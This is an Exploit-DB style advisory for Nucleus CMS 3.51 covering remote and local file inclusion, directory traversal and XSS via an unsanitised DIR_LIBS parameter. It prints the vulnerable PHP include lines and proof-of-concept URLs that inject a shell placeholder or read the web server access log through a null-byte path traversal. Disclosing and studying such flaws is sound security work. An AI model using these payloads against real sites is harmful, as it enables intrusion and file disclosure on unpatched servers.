Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability

vendor:

Nucleus CMS

by:

eidelweiss

8,1

CVSS

HIGH

Multiple Vulnerability

22, 94, 79

CWE

Product Name: Nucleus CMS

Affected Version From: 3.51

Affected Version To: 3.51

Patch Exists: YES

Related CWE: CVE-2009-4010, CVE-2009-4011, CVE-2009-4012

CPE: a:nucleus_cms:nucleus_cms

Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4012/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2009

Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability

Nucleus CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to view arbitrary files from the affected computer with the privileges of the webserver process. This may aid in further attacks. Nucleus CMS is prone to a local-file-inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to view arbitrary files from the affected computer with the privileges of the webserver process. This may aid in further attacks. Nucleus CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Upgrade to the latest version of Nucleus CMS.

Source

Exploit-DB raw data:

########################################################
    Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability
########################################################
 
 
 ____                  __                              __    __               
/\  _`\               /\ \      __                    /\ \__/\ \              
\ \ \L\_\__  __    ___\ \ \/'\ /\_\    ___      __    \ \ ,_\ \ \___      __  
 \ \  _\/\ \/\ \  /'___\ \ , < \/\ \ /' _ `\  /'_ `\   \ \ \/\ \  _ `\  /'__`\
  \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \   \ \ \_\ \ \ \ \/\  __/
   \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \   \ \__\\ \_\ \_\ \____\
    \/_/  \/___/  \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \   \/__/ \/_/\/_/\/____/
                                                /\____/                       
                                                \_/__/                        
 __      __          __          ______                       Author:eidelweiss
/\ \  __/\ \        /\ \        /\  _  \                          
\ \ \/\ \ \ \     __\ \ \____   \ \ \L\ \  _____   _____     ____ 
 \ \ \ \ \ \ \  /'__`\ \ '__`\   \ \  __ \/\ '__`\/\ '__`\  /',__\
  \ \ \_/ \_\ \/\  __/\ \ \L\ \   \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
   \ `\___x___/\ \____\\ \_,__/    \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
    '\/__//__/  \/____/ \/___/      \/_/\/_/\ \ \/  \ \ \/  \/___/
                                             \ \_\   \ \_\        
                                              \/_/    \/_/        
                                                         
 
[+]Software:    Nucleus CMS
[+]Version:	Nucleus v3.51 (Other or lower version may also be affected)
[+]License: 	GNU/GPL (Free Software)
[+]Homepage:	http://nucleuscms.org/download.php
[+]Download:	http://prdownloads.sourceforge.net/nucleuscms/nucleus3.51.zip?download
 ########################################################
 
[!]Discovered:	eidelweiss
[!]Contact:	eidelweiss[at]cyberservices[dot]com
[!]Thank`s:	sp3x (securityreason) - r0073r & 0x1D (inj3ct0r) loneferret - Exploits - dookie2000ca (exploit-db)
		JosS (hack0wn) - g1xx_achmed - [D]eal [C]yber - Syabilla_putri (i miss u so much to)
 
########################################################
 
-=[Description]=-
 
    Nucleus allows you to easily maintain your own weblog(s) on your own server. It offers a system that is easy to install, but still offers maximum flexibility. (PHP4/MySQL)

########################################################
 
	-=[VUln Code]=-
**********************************
[-][path_to_nucleus]/action.php

$CONF = array();
require('./config.php');

// common functions
include_once($DIR_LIBS . 'ACTION.php');

$action = requestVar('action');
$a =& new ACTION();
$errorInfo = $a->doAction($action);

**********************************
[-][path_to_nucleus]/nucleus/xmlrpc/server.php

$CONF = array();
require("../../config.php");	// include Nucleus libs and code
include($DIR_LIBS . "xmlrpc.inc.php");
include($DIR_LIBS . "xmlrpcs.inc.php");

**********************************
[-][path_to_nucleus]/nucleus/plugins/skinfiles/index.php

 	$strRel = '../../../'; 
	require($strRel . 'config.php');
	include($DIR_LIBS . 'PLUGINADMIN.php');

########################################################
 
	-=[ P0C ]=-
 
	Http://127.0.0.1/[path_to_nucleus]/action.php?DIR_LIBS= [inj3ct0r sh3ll]
 
	Http://127.0.0.1/[path_to_nucleus]/nucleus/xmlrpc/server.php?DIR_LIBS= [inj3ct0r sh3ll]

	Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=../../../var/log/httpd/access_log%00
				or
	Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=[lfi]%00

###############################=[E0F]=###################################